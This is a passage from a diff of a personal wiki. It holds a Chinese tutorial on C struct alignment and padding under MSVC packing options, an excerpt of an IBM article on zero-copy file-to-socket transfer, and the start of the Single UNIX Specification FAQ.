||||
double c;
|
||||
} MS3;
|
||||
|
||||
我想你一定能得出如下正确的布局图:
|
||||
|
||||
padding
|
||||
|
|
||||
_____v_________________________________
|
||||
| |\| |\\\\\\\\\| |
|
||||
| a |\ | b |\padding\| c |
|
||||
| |\| |\\\\\\\\\| |
|
||||
+-------------------------------------+
|
||||
Bytes: 1 1 2 4 8
|
||||
|
||||
sizeof(short)等于2,b字段应从偶数地址开始,所以a的后面填充一个字节,而sizeof(double)等于8,c字段要从8倍数地址开始,前面的a、b字段加上填充字节已经有4 bytes,所以b后面再填充4个字节就可以保证c字段的对齐要求了。__sizeof(MS3)等于16__,b的偏移是2,c的偏移是8。接着看看结构体中字段还是结构类型的情况:
|
||||
|
||||
typedef struct ms4
|
||||
{
|
||||
char a;
|
||||
MS3 b;
|
||||
} MS4;
|
||||
|
||||
MS3中内存要求最严格的字段是c,那么__MS3类型数据的对齐模数就与double的一致__(为8),a字段后面应填充7个字节,因此MS4的布局应该是:
|
||||
_______________________________________
|
||||
| |\\\\\\\\\\\| |
|
||||
| a |\\padding\\ | b |
|
||||
| |\\\\\\\\\\\| |
|
||||
+-------------------------------------+
|
||||
Bytes: 1 7 16
|
||||
|
||||
显然,sizeof(MS4)等于24,b的偏移等于8。
|
||||
|
||||
在实际开发中,我们可以通过指定__/Zp__编译选项来更改编译器的对齐规则。比如指定/Zpn(VC7.1中n可以是1、2、4、8、16)就是告诉编译器**最大对齐模数是n**。在这种情况下,所有**小于等于n字节的基本数据类型的对齐规则与默认的一样**,但是大于n个字节的数据类型的对齐模数被限制为n。事实上,VC7.1的默认对齐选项就相当于__/Zp8__。仔细看看MSDN对这个选项的描述,会发现它郑重告诫了程序员不要在MIPS和Alpha平台上用/Zp1和/Zp2选项,也不要在16位平台上指定/Zp4和/Zp8(想想为什么?)。改变编译器的对齐选项,对照程序运行结果重新分析上面4种结构体的内存布局将是一个很好的复习。
|
||||
|
||||
到了这里,我们可以回答本文提出的最后一个问题了。__结构体的内存布局依赖于CPU、操作系统、编译器及编译时的对齐选项__,而你的程序可能需要运行在多种平台上,你的源代码可能要被不同的人用不同的编译器编译(试想你为别人提供一个开放源码的库),那么除非绝对必需,否则__你的程序永远也不要依赖这些诡异的内存布局__。顺便说一下,如果一个程序中的两个模块是用不同的对齐选项分别编译的,那么它很可能会产生一些非常微妙的错误。如果你的程序确实有很难理解的行为,不防仔细检查一下各个模块的编译选项。
|
||||
|
||||
思考题:请分析下面几种结构体在你的平台上的内存布局,并试着寻找一种合理安排字段声明顺序的方法以尽量节省内存空间。
|
||||
|
||||
A. struct P1 { int a; char b; int c; char d; };
|
||||
B. struct P2 { int a; char b; char c; int d; };
|
||||
C. struct P3 { short a[3]; char b[3]; };
|
||||
D. struct P4 { short a[3]; char *b[3]; };
|
||||
E. struct P5 { struct P2 *a; char b; struct P1 a[2]; };
|
||||
|
||||
参考资料:
|
||||
|
||||
【1】《深入理解计算机系统(修订版)》,
|
||||
(著)Randal E.Bryant; David O'Hallaron,
|
||||
(译)龚奕利 雷迎春,
|
||||
中国电力出版社,2004
|
||||
|
||||
【2】《C: A Reference Manual》(影印版),
|
||||
(著)Samuel P.Harbison; Guy L.Steele,
|
||||
人民邮电出版社,2003
|
||||
|
||||
作者Blog:http://blog.csdn.net/soloist/
|
||||
---------------------------------------------------------------------------------
|
||||
问题:下面的试验,请问如何解释?
|
||||
#pragma pack(push, 2)
|
||||
struct s
|
||||
{
|
||||
char a;
|
||||
};
|
||||
#pragma pack (pop)
|
||||
|
||||
void TestPack()
|
||||
{
|
||||
s c[2];
|
||||
assert(sizeof(s)==1);
|
||||
assert(sizeof(c)==2);
|
||||
}
|
||||
|
||||
int _t main(int argc, _TCHAR* argv[])
|
||||
{
|
||||
TestPack();
|
||||
return 0;
|
||||
}
|
||||
解答:
|
||||
每一种基本的数据类型都有该数据类型的对齐模数(alignment modulus)。Win32平台下的微软C编译器(cl.exe for 80x86)在默认
|
||||
情况下: **任何基本数据类型T的对齐模数就是T的大小,即sizeof(T)**。
|
||||
一组可能的对齐模数数据如下:
|
||||
数据类型 模数
|
||||
------------------
|
||||
char 1
|
||||
shor 2
|
||||
int 4
|
||||
double 8
|
||||
**ANSI C规定一种结构类型的大小是它所有字段的大小以及字段之间或字段尾部的填充区大小之和。**
|
||||
注:填充区就是为了使结构体字段满足内存对齐要求而额外分配给结构体的空间。
|
||||
|
||||
产生填充区的条件:
|
||||
当结构体中的成员一种类型S的对齐模数与另一种类型T的对齐模数不一致的时候,才可能产生填充区。
|
||||
我们通过编译选项设置__/zpn 或#pragma pack(push, n) __来设置内存对齐模数时,当结构体中的某中基本数据类型的对齐模数__大于n__时才会影响填充区的大小,否则将会按照基本数据类型的对齐模数进行对齐。
|
||||
例子:
|
||||
当n = 1时:
|
||||
#pragma pack(push,1)
|
||||
typedef struct ms3{char a; short b; double c; } MS3;
|
||||
#pragma pack(pop)
|
||||
这时n=1,此结构中基本数据类型short的对齐模数为2,double为8,大于n 所以将会影响这两个变量存储时地址的偏移量,必须是n的整数倍,而char的对齐模数是1,小于等于n,将会按照其自身的对齐模数1进行对齐.
|
||||
因为n=1,所以这三个变量在内存中是连续的而不存在填充区.内存布局如下:
|
||||
___________________________
|
||||
| a | b | c |
|
||||
+-------------------------+
|
||||
Bytes: 1 2 8
|
||||
|
||||
sizeof(MS3) = 11
|
||||
当n = 2时:
|
||||
#pragma pack(push,2)
|
||||
typedef struct ms3{char a; short b; double c; } MS3;
|
||||
#pragma pack(pop)
|
||||
这时n=2,此结构中基本数据类型double的对齐模数为8,大于n, 所以将会影响这个变量存储时地址的偏移量,**必须是n的整数倍**,而char 和 short 的对齐模数小于等于n, 将会**按照其自身的对齐模数**分别是1,2进行对齐.内存布局如下:
|
||||
____________________________
|
||||
| a |\| b | c |
|
||||
+---------------------------+
|
||||
Bytes: 1 1 2 8
|
||||
|
||||
此时变量c的存储地址偏移是4,是n=2的整数倍,当然偏移为6,8等等时也满足这个条件,但编译器不至于愚蠢到这种地步白白浪费空间,呵。
|
||||
sizeof(MS3) = 12
|
||||
当n = 4时:与n=2时结果是一样的.
|
||||
|
||||
当n = 8时:
|
||||
#pragma pack(push,8)
|
||||
typedef struct ms3{char a; short b; double c; } MS3;
|
||||
#pragma pack(pop)
|
||||
这时n=8,此结构中char ,short ,double的对齐模数为都,小于等于n,将会按照其自身的对齐模数分别是1,2,8进行对齐.即:short变量存储时地址的偏移量是2的倍数;double变量存储时地址的__偏移量是8__的倍数.
|
||||
内存布局如下:
|
||||
_______________________________________
|
||||
| a |\| b |\padding\| c |
|
||||
+-------------------------------------+
|
||||
Bytes: 1 1 2 4 8
|
||||
|
||||
此时变量a的存储地址偏移是0,当然也是char型对齐模数1的整数倍了
|
||||
变量b的存储地址偏移要想是short型对齐模数2的整数倍,因为前面a占了1 个byte ,所以至少在a 与b之间再加上1 个byte的padding.才能满足条件。
|
||||
变量c的存储地址骗移要想是double型对齐模数8的整数倍,因为前面a 和b 加 1个byte 的padding,共4 bytes所以最少还需要4 bytes的padding才能满足条件。
|
||||
sizeof(MS3) = 16
|
||||
当n = 16时:与n=8时结果是一样的.
|
||||
====================================================
|
||||
根据上面的分析,如下定义的结构
|
||||
#pragma pack(push, 2)
|
||||
struct s
|
||||
{
|
||||
char a;
|
||||
};
|
||||
#pragma pack (pop)
|
||||
|
||||
因为char 的对齐模数是1,小于n=2,所以将按照自身的对齐模数对齐。**根本就不会存在填充区**,所以sizeof(s) = 1.对于s c[2]; sizeof(c)==2 也是必然的。
|
||||
再看下面的结构:
|
||||
#pragma pack(push, n)//n=(1,2,4,8,16)
|
||||
struct s
|
||||
{
|
||||
double a;
|
||||
double b;
|
||||
double c;
|
||||
};
|
||||
#pragma pack (pop)
|
||||
对于这样的结构无论pack设置的对齐模数为几都不会影响其大小,即无padding.
|
||||
double 类型的对齐模数为8
|
||||
当n<8时,虽然满足前面讲的规则:当结构体中的某中基本数据类型的对齐模数大于n时才会影响填充区的大小。但这个时候无论n等于几(1,2,4),double 变量存储时地址的偏移量都是n的整数倍,所以根本不需要填充区。当n>=8时,自然就按照double 的对齐模数进行对齐了.因为类型都一样所以变量之间在内存中不会存在填充区.
|
||||
---------------------------------------------------------------------------------------------------------------------
|
||||
补充一点:
|
||||
__如果在定义结构的时候,仔细调整顺序,适当明确填充方式,则最终内存结果可以与编译选项/Zpn 或 pack无关。__
|
||||
举个例子:
|
||||
typedef struct ms1{ char a; char b; int c; short d; } MS1;
|
||||
在不同的 /Zpn下,sizeof(MS1)的长度可能不同,也就是内存布局不同。
|
||||
如果改成
|
||||
typedef struct ms2{ char a; char b; short d; int c; } MS2;
|
||||
即便在不同的/Zpn或pack方式下,编译生成的内存布局总是相同的;
|
||||
|
||||
再比如:
|
||||
typedef struct ms3{ char a; char b; int c; } MS3;
|
||||
可以改写成:
|
||||
typedef struct ms4{ char a; char b; __short padding__; int c; } MS4; __ 显式地写上 padding__
|
||||
|
||||
__(通过源代码本身来消除隐患,要比依赖编译选项更加可靠,并易于移植,优质的代码应该做到这一点)__
|
||||
(减少隐含padding的另外一个好处是少占内存,当结构的实例数量很大时,内存的节省量是非常可观的)
|
||||
(以上的变量/结构命名没有遵循命名规范,只为说明用,不可模仿)
|
||||
@@ -0,0 +1,48 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T23:16:15+08:00
|
||||
|
||||
====== Data transfer ---The traditional approach ======
|
||||
Created 星期六 04 六月 2011
|
||||
http://www.ibm.com/developerworks/linux/library/j-zerocopy/
|
||||
Many Web applications serve a significant amount of static content, which amounts to reading data off of a disk and writing the exact same data back to the response socket. This activity might appear to require relatively little CPU activity, but it's somewhat inefficient: the kernel reads the data off of disk and pushes it across the kernel-user boundary to the application, and then the application pushes it back across the kernel-user boundary to be written out to the socket. In effect, the application serves as an inefficient intermediary that gets the data from the disk file to the socket.
|
||||
|
||||
Each time data traverses the user-kernel boundary, it must be copied, which consumes CPU cycles and memory bandwidth. Fortunately, you can eliminate these copies through a technique called — appropriately enough — zero copy. Applications that use zero copy request that the kernel copy the data directly from the disk file to the socket, without going through the application. Zero copy greatly improves application performance and reduces the number of context switches between kernel and user mode.
|
||||
|
||||
The Java class libraries support zero copy on Linux and UNIX systems through the transferTo() method in java.nio.channels.FileChannel. You can use the transferTo() method to transfer bytes directly from the channel on which it is invoked to another writable byte channel, without requiring data to flow through the application. This article first demonstrates the overhead incurred by simple file transfer done through traditional copy semantics, then shows how the zero-copy technique using transferTo() achieves better performance.
|
||||
|
||||
Date transfer: The traditional approach
|
||||
|
||||
Consider the scenario of reading from a file and transferring the data to another program over the network. (This scenario describes the behavior of many server applications, including Web applications serving static content, FTP servers, mail servers, and so on.) The core of the operation is in the two calls in Listing 1 (see Download for a link to the complete sample code):
|
||||
|
||||
Listing 1. Copying bytes from a file to a socket
|
||||
|
||||
File.read(fileDesc, buf, len);
|
||||
Socket.send(socket, buf, len);
|
||||
|
||||
|
||||
Although Listing 1 is conceptually simple, internally, the copy operation requires four context switches between user mode and kernel mode, and the data is copied four times before the operation is complete. Figure 1 shows how data is moved internally from the file to the socket:
|
||||
|
||||
Figure 1. Traditional data copying approach
|
||||
Traditional data copying approach
|
||||
{{./figure1.gif}}
|
||||
Figure 2 shows the context switching:
|
||||
|
||||
Figure 2. Traditional context switches
|
||||
Traditional context switches
|
||||
{{./figure2.gif}}
|
||||
The steps involved are:
|
||||
|
||||
The read() call causes a context switch (see Figure 2) from user mode to kernel mode. Internally a sys_read() (or equivalent) is issued to read the data from the file. The first copy (see Figure 1) is performed by the direct memory access (DMA) engine, which reads file contents from the disk and stores them into a kernel address space buffer.
|
||||
|
||||
The requested amount of data is copied from the read buffer into the user buffer, and the read() call returns. The return from the call causes another context switch from kernel back to user mode. Now the data is stored in the user address space buffer.
|
||||
|
||||
The send() socket call causes a context switch from user mode to kernel mode. A third copy is performed to put the data into a kernel address space buffer again. This time, though, the data is put into a different buffer, one that is associated with the destination socket.
|
||||
|
||||
The send() system call returns, creating the fourth context switch. Independently and asynchronously, a fourth copy happens as the DMA engine passes the data from the kernel buffer to the protocol engine.
|
||||
|
||||
Use of the intermediate kernel buffer (rather than a direct transfer of the data into the user buffer) might seem inefficient. But intermediate kernel buffers were introduced into the process to improve performance. Using the intermediate buffer on the read side allows the kernel buffer to act as a "readahead cache" when the application hasn't asked for as much data as the kernel buffer holds. This significantly improves performance when the requested data amount is less than the kernel buffer size. The intermediate buffer on the write side allows the write to complete asynchronously.
|
||||
|
||||
Unfortunately, this approach itself can become a performance bottleneck if the size of the data requested is considerably larger than the kernel buffer size. The data gets copied multiple times among the disk, kernel buffer, and user buffer before it is finally delivered to the application.
|
||||
|
||||
Zero copy improves performance by eliminating these redundant data copies.
|
||||
|
After Width: | Height: | Size: 7.6 KiB |
|
After Width: | Height: | Size: 5.0 KiB |
7
Zim/Programme/APUE/FAQ.txt
Normal file
@@ -0,0 +1,7 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:05:21+08:00
|
||||
|
||||
====== FAQ ======
|
||||
Created 星期二 07 六月 2011
|
||||
|
||||
@@ -0,0 +1,610 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T12:33:20+08:00
|
||||
|
||||
====== Single UNIX Specification Frequently Asked Questions (FAQ Version 1.9) ======
|
||||
Created 星期二 07 六月 2011
|
||||
http://www.opengroup.org/austin/papers/single_unix_faq.html
|
||||
|
||||
Single UNIX Specification Frequently Asked Questions (FAQ Version 1.9)
|
||||
|
||||
Last Updated : Oct 28 2004: freq.ques,v 1.9
|
||||
|
||||
This is the Frequently Asked Questions file for the Single UNIX Specification. Its maintainer is Andrew Josey (ajosey at The Open Group ). Suggestions and contributions are always welcome.
|
||||
|
||||
This document can be found on the world wide web at http://www.opengroup.org/austin/papers/single_unix_faq.html.
|
||||
|
||||
UNIX® is a registered trademark of The Open Group in the USA and other countries.
|
||||
|
||||
The Open Group holds the definition of what a UNIX system is and its associated trademark in trust for the industry. The official web site for more information is http://www.unix.org.
|
||||
|
||||
This article includes answers to the following.
|
||||
|
||||
|
||||
Q0. What is the Single UNIX Specification?
|
||||
Q1. What is The Open Group Base Working Group ?
|
||||
Q2. What is the Austin Group?
|
||||
Q3. What is the latest version of the Single UNIX Specification?
|
||||
Q4. Where can I read/download the Single UNIX Specification Version 3 from? Is there a book?
|
||||
Q5. Where can I read/download earlier versions of the Single UNIX Specification from?
|
||||
Q6. How do I become a participant in the Working Groups?
|
||||
Q7. What is covered in the Base Definitions Technical Standard (XBD)?
|
||||
Q8. What is covered in the System Interfaces Technical Standard (XSH)?
|
||||
Q9. What is covered in the Shell and Utilities Technical Standard (XCU)?
|
||||
Q10. What is covered in the Rationale Technical Standard (XRAT)
|
||||
Q11. What is covered in the X/Open Curses Specification (XCURSES)?
|
||||
Q12. How many APIs are there? Is there a list of APIs?
|
||||
Q13. What Options are there in the Version 3 Specification?
|
||||
Q14. What are the required directories and devices?
|
||||
Q15. What regular expressions are supported?
|
||||
Q16. How should I compile a conforming program?
|
||||
Q17. What is the Relationship to the ISO C Standard?
|
||||
Q18. What happened to the Networking Services Specification (XNS)?
|
||||
Q19. What System Interfaces are included by Category?
|
||||
Q20. What is the history of the development of the Single UNIX Specification?
|
||||
Q21. How does the Single UNIX Specification compare to the Linux Standard Base?
|
||||
Q22. What are the core technical changes in the latest version of the Single UNIX Specification?
|
||||
Q23. Does removal of obsolescent utility syntax mean that implementations supporting usages of head -5 file, tail -5 file, tail -l file are no longer allowed?
|
||||
Q24. Does an operating system have to be derived from AT&T/SCO code to meet the Single UNIX Specification?
|
||||
Q25. What about UNIX Certification?
|
||||
Q26. Where can I get a UNIX License Plate from?
|
||||
Q27. How do I get permission to excerpt materials from the standard for reuse in my product?
|
||||
Q28. How do I add a question to this FAQ?
|
||||
|
||||
Q0. What is the Single UNIX Specification?
|
||||
|
||||
The Single UNIX Specification is a set of open, consensus specifications that define the requirements for a conformant UNIX system. The standardized programming environment provides a broad-based functional set of interfaces to support the porting of existing UNIX applications and the development of new applications. The environment also supports a rich set of tools for application development.
|
||||
|
||||
The Single UNIX Specification came into being when in 1994 Novell (who had acquired the UNIX systems business of AT&T/USL) decided to get out of that business. Rather than sell the business as a single entity, Novell transferred the rights to the UNIX trademark and the specification (that subsequently became the Single UNIX Specification) to The Open Group (at the time X/Open Company). Subsequently, it sold the source code and the product implementation (UNIXWARE) to SCO. The Open Group also owns the trademark UNIXWARE, transferred to them from SCO more recently.
|
||||
|
||||
Q1. What is The Open Group Base Working Group ?
|
||||
|
||||
The Open Group's Base Working Group is the group that has and continues to develop the technical specifications that make up the Single UNIX Specification. More information can be found at http://www.opengroup.org/platform/ . The Base Working Group is one of the three parties involved in the Austin Group that maintain the Base Specifications of the Single UNIX Specification Version 3, which are also IEEE Std 1003.1 (POSIX) and ISO/IEC 9945.
|
||||
Q2. What is the Austin Group?
|
||||
|
||||
The Austin Common Standards Revision Group (CSRG) is a joint technical working group established to develop and maintain the core volumes of the Single UNIX Specification, which are also the POSIX 1003.1 standard and ISO/IEC 9945. Anyone wishing to participate in the Austin Group can do so. There are no fees for participation or membership. You may participate as an observer or as a contributor. You do not have to attend face-to-face meetings to participate, electronic participation is most welcome.
|
||||
|
||||
See http://www.opengroup.org/austin/ for more information.
|
||||
|
||||
See http://www.opengroup.org/austin/faq.html for the Austin Group FAQ.
|
||||
|
||||
Q3. What is the latest version of the Single UNIX Specification?
|
||||
|
||||
The latest version is the Single UNIX Specification Version 3. The 2004 edition of the Single UNIX Specification was published on April 30th 2004, and updates the 2001 and 2003 editions of the specification to include Technical Corrigendum 1 (TC1) and Technical Corrigendum 2 (TC2). It consists of The Open Group Base Specifications Issue 6 and the X/Open Curses, Issue 4, Version 2 specification.
|
||||
|
||||
The Single UNIX Specification uses The Open Group Base Specifications, Issue 6 documentation as its core. The documentation is structured as follows:
|
||||
|
||||
Base Definitions, Issue 6 (XBD)
|
||||
Shell and Utilities, Issue 6 (XCU)
|
||||
System Interfaces, Issue 6 (XSH)
|
||||
Rationale (Informative)
|
||||
|
||||
New for this version of the Single UNIX Specification is the incorporation of IEEE Std 1003.1 (POSIX) and ISO/IEC 9945 into the document set; The Open Group Base Specifications, Issue 6, ISO/IEC 9945 and IEEE Std 1003.1, 2004 Edition are technically identical. The base document for the joint revision of the documents was The Open Group's Base volumes of its Single UNIX Specification, Version 2. These were selected since they were a superset of the existing POSIX.1 and POSIX.2 specifications and had some organizational aspects that would benefit the audience for the new revision.
|
||||
|
||||
Detailed information on the Single UNIX Specification, including accessing the version 3 specification in html is available at http://www.unix.org/version3/
|
||||
|
||||
Q4. Where can I read/download the Single UNIX Specification Version 3 from? Is there a book?
|
||||
|
||||
The html version of the latest version (which incorporates technical corrigendum 1) is available to read and download from: URL:http://www.unix.org/version3/, you need to register for a copy.
|
||||
|
||||
A summary of the changes in Technical Corrigendum 1 is available from: URL:http://www.opengroup.org/austin/docs/austin_155.txt.
|
||||
|
||||
The pdf text of just the Technical Corrigendum 1 (changes to the 2001 edition) is available from: URL: http://www.opengroup.org/pubs/catalog/u057.htm .
|
||||
|
||||
The pdf text of just the Technical Corrigendum 2 (changes to both the 2001 and 2003 editions) is available from: URL: http://www.opengroup.org/pubs/catalog/u059.htm .
|
||||
|
||||
A summary of the changes in Technical Corrigendum 2 is available from: URL:http://www.opengroup.org/austin/docs/austin_206.txt.
|
||||
|
||||
The complete specification in pdf format is available to members of The Open Group from The Open Group publications catalog. If you wish to signup up your organization to become a member of The Open Group and are an active participant in the Austin Group you can sign up for no fee at http://www.opengroup.org/austin/ogmembers/ (note this is for companies and organizations only). If you want to join as an individual, or are working on standardization activities and need a copy to assist you in your work, please contact Andrew Josey directly, he can then add you as an individual affiliate member.
|
||||
|
||||
Ongoing draft specifications for future technical corrigenda are available online from the Austin Group web site at http://www.opengroup.org/austin/ . You need to be a member of the Austin Group. Information on how to join the group is on the web site.
|
||||
|
||||
URL:http://www.opengroup.org/austin/. (Austin Group Home Page)
|
||||
|
||||
Periodically The Open Group does hardcopy runs on the complete 4000 page request.Check the Open Group publications catalog for availability (http://www.opengroup.org/publications/). The Open Group also produces a number of Guide Books, including The Single UNIX Specification Version 3 on CDROM, The Authorized Guide (http://www.unix.org/version3/theguide.html), and the UNIX Internationalization Guide (this is the latest) (http://www.opengroup.org/publications/catalog/g032.htm).
|
||||
|
||||
Q5. Where can I read/download earlier version of the Single UNIX Specification from?
|
||||
|
||||
The specifications that make up the original Single UNIX Specification (1994) and the Single UNIX Specification Version 2 (1997), and other related specifications can be download in pdf, and html where available, from The Open Group publications catalog at http://www.opengroup.org/publications/catalog/un.htm.
|
||||
|
||||
Q6. How do I become a participant in the Working Groups?
|
||||
|
||||
To participate in the Austin Group just join the open mailing list. See http://www.opengroup.org/austin/lists.html for more information.
|
||||
|
||||
URL:http://www.opengroup.org/austin/lists.html. (How to Join the Austin Group)
|
||||
|
||||
If you want to join the Base Working Group please contact Andrew Josey for further information.
|
||||
|
||||
Q7. What is covered in the Base Definitions Technical Standard (XBD)?
|
||||
|
||||
The XBD document is part of the Base Specifications, Issue 6. XBD provides common definitions for the Base Specifications of the Single UNIX Specification; therefore readers should be familiar with it before using the other parts of the Single UNIX Specification. The presence of this document reduces duplication in the other related parts of the Single UNIX Specification and ensures consistent use of terminology.
|
||||
|
||||
This document is structured as follows:
|
||||
|
||||
Chapter 1 is an introduction which includes the scope of the Base Specifications, and the scope of the changes made in this revision. Normative references, terminology, and portability codes used throughout the Base Specifications are included in this chapter.
|
||||
|
||||
Chapter 2 defines the conformance requirements, both for implementation and application conformance. For implementation conformance, this includes documentation requirements, conformance definitions for the core POSIX subset, conformance definitions for systems conforming to the Single UNIX Specification (denoted as the XSI extension), and option groups (previously known as feature groups).
|
||||
|
||||
Chapter 3 contains the general terms and definitions that apply throughout the Base Specifications.
|
||||
|
||||
Chapter 4 describes general concepts that apply throughout the Base Specifications.
|
||||
|
||||
Chapter 5 describes the notation used to specify file input and output formats in XBD and XCU.
|
||||
|
||||
Chapter 6 describes the portable character set and the process of character set definition.
|
||||
|
||||
Chapter 7 describes the syntax for defining internationalization locales as well as the POSIX locale provided on all systems.
|
||||
|
||||
Chapter 8 describes the use of environment variables for internationalization and other purposes.
|
||||
|
||||
Chapter 9 describes the syntax of pattern matching using regular expressions employed by many utilities and matched by the regcomp() and regexec() functions. Both Basic Regular Expressions (BREs) and Extended Regular Expressions (EREs) are described in this chapter.
|
||||
|
||||
Chapter 10 describes files and devices found on all systems and their semantics. For example, the device /dev/null is an infinite data source and data sink.
|
||||
|
||||
Chapter 11 describes the asynchronous terminal interface for many of the functions in XSH and the stty utility in XCU.
|
||||
|
||||
Chapter 12 describes the policies for command line argument construction and parsing. It contains the utility argument syntax used throughout XCU, and also utility syntax guidelines for naming of utilities and the specification of their arguments and option-arguments and operands.
|
||||
|
||||
Chapter 13 defines the contents of headers which declare constants, macros, and data structures that are needed by programs using the services provided by the system interfaces defined in XSH. These are in the form of reference pages and are organized alphabetically.
|
||||
|
||||
Q8. What is covered in the System Interfaces Technical Standard (XSH)
|
||||
|
||||
The XSH document is part of the Base Specifications, Issue 6. XSH describes a set of system interfaces offered to application programs by systems conformant to this part of the Single UNIX Specification. Readers are expected to be experienced C language programmers, and to be familiar with the XBD document.
|
||||
|
||||
This document is structured as follows:
|
||||
|
||||
Chapter 1 explains the status of this document and its relationship to other formal standards. The scope, conformance, and definitions sections are pointers to the XBD document; the sections are here to meet ISO/IEC rules regarding required sections. The terminology and portability codes are identical to the section in XBD and repeated here for ease of reference.
|
||||
|
||||
Chapter 2 contains important concepts, terms, and caveats relating to the rest of this document. This includes information on the compilation environment, the name space, definitions of error numbers, signal concepts, standard I/O streams, STREAMS, XSI IPC, realtime, threads, sockets, tracing, and data types.
|
||||
|
||||
Chapter 3 defines the functional interfaces to systems conformant to this part of the Single UNIX Specification. These are in the form of reference pages and are organized alphabetically.
|
||||
|
||||
Q9. What is covered in the Shell and Utilities Technical Standard (XCU)?
|
||||
|
||||
The XCU1 document is part of the Base Specifications, Issue 6. XCU describes the shell and utilities that are available to application programs on systems conformant to this part of the Single UNIX Specification. Readers are expected to be familiar with the XBD document.
|
||||
|
||||
This document is structured as follows:
|
||||
|
||||
Chapter 1 explains the status of this document and its relationship to other formal standards, including the ISO C standard and also the XSH document. It also describes the utility limits, grammar conventions, defaults used by the utility descriptions, considerations for utilities in support of large files, and the list of required built-in utilities. The scope, conformance, and definitions sections are pointers to the XBD document; the sections are here to meet ISO/IEC rules regarding required sections. The terminology and portability codes are identical to the section in XBD and repeated here for ease of reference.
|
||||
|
||||
Chapter 2 describes the command language-that is, the shell command language interpreter-used in systems conformant to the Single UNIX Specification.
|
||||
|
||||
Chapter 3 describes a set of services and utilities that are implemented on systems supporting the Batch Environment option.
|
||||
|
||||
Chapter 4 consists of reference pages for all utilities available on systems conforming to the Single UNIX Specification. These are in the form of reference pages and are organized alphabetically.
|
||||
|
||||
Footnote
|
||||
|
||||
1.
|
||||
The acronym ``XCU'' derives from the previous version of the specification which was called ``Commands and Utilities''.
|
||||
|
||||
Q10. What is covered in the Rationale Technical Standard (XRAT)
|
||||
|
||||
The XRAT document is part of the Base Specifications, Issue 6. The XRAT document has been published to assist in the process of review and understanding of the main text. It contains historical information concerning the contents of the Base Specifications, Issue 6 and why features were included or discarded by the standard developers. It also contains notes of interest to application programmers on recommended programming practices, emphasizing the consequences of some aspects that may not be immediately apparent.
|
||||
|
||||
This document is organized in parallel to the normative documents of the Base Specification, with a separate part (Parts A, B, and C) for each of the three normative documents. In addition, two additional parts are included: Part D, Portability Considerations and Part E Subprofiling Considerations. The Portability Considerations chapter includes a report on the perceived user requirements for the Base Specification and how the facilities provided satisfy those requirements, together with guidance to writers of profiles on how to use the configurable options, limits, and optional behavior. The Subprofiling Considerations chapter satisfies the requirement that the document address subprofiling. This contains an example set of subprofiling options.
|
||||
Q11. What is covered in the X/Open Curses Specification (XCURSES)?
|
||||
|
||||
XCURSES is not part of the Base Specifications, Issue 6. XCURSES describes a set of interfaces providing a terminal-independent method of updating character screens that are available to application programs on systems conformant to this part of the Single UNIX Specification. This document should be read in conjunction with The Open Group Corrigendum U056.
|
||||
|
||||
This document is structured as follows:
|
||||
|
||||
Chapter 1 introduces Curses, gives an overview of enhancements that have been made to this version, and lists specific interfaces marked TO BE WITHDRAWN. This chapter also defines the requirements for conformance to this document and shows the generic format followed by interface definitions in Chapter 4.
|
||||
|
||||
Chapter 2 describes the relationship between Curses and the C language, the compilation environment, and the X/Open System Interface (XSI) operating system requirements. It also defines the effect of the interface on the name space for identifiers and introduces the major data types that the interfaces use.
|
||||
|
||||
Chapter 3 gives an overview of Curses. It discusses the use of some of the key data types and gives general rules for important common concepts such as characters, renditions, and window properties. It contains general rules for the common Curses operations and operating modes. This information is implicitly referenced by the interface definitions in Chapter 4. The chapter explains the system of naming the Curses functions and presents a table of function families. Finally, the chapter contains notes regarding use of macros and restrictions on block-mode terminals.
|
||||
|
||||
Chapter 4 defines the Curses functional interfaces.
|
||||
|
||||
Chapter 5 defines the contents of headers which declare constants, macros, and data structures that are needed by programs using the services provided by Chapter 4.
|
||||
|
||||
Chapter 6 discusses the terminfo database which Curses uses to describe terminals. The chapter specifies the source format of a terminfo entry using a formal grammar, an informal discussion, and an example. Boolean, numeric, and string capabilities are presented in tabular form.
|
||||
|
||||
Appendix A discusses the use of these capabilities by the writer of a terminfo entry to describe the characteristics of the terminal in use.
|
||||
|
||||
The chapters are followed by a glossary, which contains normative definitions of terms used in the document.
|
||||
|
||||
Q12. How many APIs are there? Is there a list of APIs?
|
||||
|
||||
There are 1742 APIs, broken down as follows: XSH 1123, XCU 160, XBD 84 and XCURSES 375.
|
||||
|
||||
A list of APIs is available at http://www.unix-systems.org/version3/apis.html.
|
||||
|
||||
Q13. What Options are there in the Version 3 Specification?
|
||||
|
||||
The Version 3 Specification includes a set of profiling options, allowing larger profiles of the options of the Base standard. In earlier versions of the Single UNIX Specification these were formerly known as Feature Groups. The Option Groups within the Single UNIX Specification are defined within XBD, Section 2.1.5.2, XSI Option Groups.
|
||||
|
||||
The Single UNIX Specification Version 3 contains the following Option Groups:
|
||||
|
||||
Encryption, covering the functions crypt(), encrypt( ), and setkey.()
|
||||
Realtime, covering the functions from the IEEE Std 1003.1b-1993 Realtime extension.
|
||||
Realtime Threads, covering the functions from the IEEE Std 1003.1c-1995 Threads extension that are related to realtime functionality.
|
||||
Advanced Realtime, covering some of the non-threads-related functions from IEEE Std 1003.1d-1999 and IEEE Std 1003.1j-2000.
|
||||
Advanced Realtime Threads, covering some of the threads-related functions from IEEE Std 1003.1d-1999 and IEEE Std 1003.1j-2000.
|
||||
Tracing, covering the functionality from IEEE Std 1003.1q-2000.
|
||||
XSI STREAMS, covering the functionality and interfaces related to STREAMS, a uniform mechanism for implementing networking services and other character-based I/O as described in XSH, Section 2.6, STREAMS. This was mandatory in previous versions of the Single UNIX Specification, but is now optional in this version.
|
||||
Legacy, covering the functionality and interfaces which were mandatory in previous versions of the Single UNIX Specification, but are optional in this version.
|
||||
|
||||
Q14. What are the required directories and devices?
|
||||
|
||||
The Single UNIX Specification describes an applications portability environment, and as such defines a certain minimal set of directories and devices that applications regularly use.
|
||||
|
||||
The following directories are defined:
|
||||
|
||||
/ The root directory of the file system.
|
||||
/dev Contains the devices /dev/console, /dev/null, and /dev/tty.
|
||||
/tmp A directory where applications can create temporary files.
|
||||
|
||||
